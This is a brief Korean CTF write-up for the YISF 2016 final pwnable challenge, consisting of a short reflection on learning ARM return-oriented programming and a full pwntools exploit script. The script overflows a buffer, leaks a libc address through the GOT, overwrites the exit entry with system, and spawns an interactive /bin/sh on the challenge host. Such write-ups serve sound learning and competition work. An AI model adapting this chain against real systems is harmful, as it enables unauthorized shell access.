YISF2016 Final pwnable

후기 : ret2zp라는 기법을 알고 x86이랑은 다르게 인자 처리가 더욱 심화되서 어찌해야할지 매우 막막했는데

도현이의 write-up을 참고하고 안보고 따라 짜보면서 arm rop에 대해 많이 익숙해진 것 같다.

Special Thanks to 김도현

from pwn import *

sori_pi = ssh(host='sori', port=1234, user='x', password='x')

elf = ELF('/home/cdor1/pwnable/pwn')
libc = ELF('/home/cdor1/pwnable/sori_libc.so.6')
t = sori_pi.run('/home/cdor1/pwn')

buf = 0x10710
exit = elf.plt['exit']
exit_got = elf.got['exit']
puts = elf.plt['puts']
start_main_got = elf.got['__libc_start_main']
data = 0x212b8
offset = libc.symbols['system'] - libc.symbols['__libc_start_main']
ppr = 0x109ac
movr7r0 = 0x10f24
load = 0x10f3c

print '[*] main : ' + hex(start_main_got)
print '[*] exit : ' + hex(exit)
print '[*] exit_got : ' + hex(exit_got)
print '[*] puts : ' + hex(puts)
print '[*] .data : ' + hex(data)
print '[*] offset : ' + hex(offset)

p1 = 'A'*172
p1 += p32(ppr)

p2 = p32(0xdeadbeef)
p2 += p32(load)
p2 += p32(puts)
p2 += 'A'*12
p2 += p32(start_main_got)
p2 += 'A'*8
p2 += p32(movr7r0)

p2 += "A"*28
p2 += p32(load)
p2 += p32(buf)
p2 += "A"*12
p2 += p32(exit_got)
p2 += 'A'*8
p2 += p32(movr7r0)

p2 += 'A'*28
p2 += p32(load)
p2 += p32(buf)
p2 += 'A'*12
p2 += p32(data)
p2 += 'A'*8
p2 += p32(movr7r0)

p2 += 'A'*28
p2 += p32(load)
p2 += p32(exit)
p2 += 'A'*12
p2 += p32(data)
p2 += 'A'*8
p2 += p32(movr7r0)

print t.recvuntil('Authenticode : ')
t.sendline(p2)
print t.recvuntil('name? ')
t.sendline(p1)
print t.recvuntil('6. quit-> ')
t.sendline('6')

l = t.recv(1024).split("bye\n")[1]
main = u32(l[:4])
print '[*] start_main_libc : ' + hex(main)
system = main + offset
print '[*] system : ' + hex(system)

t.sendline(p32(system))
sleep(0.5)
t.sendline('/bin/sh\x00')

t.interactive()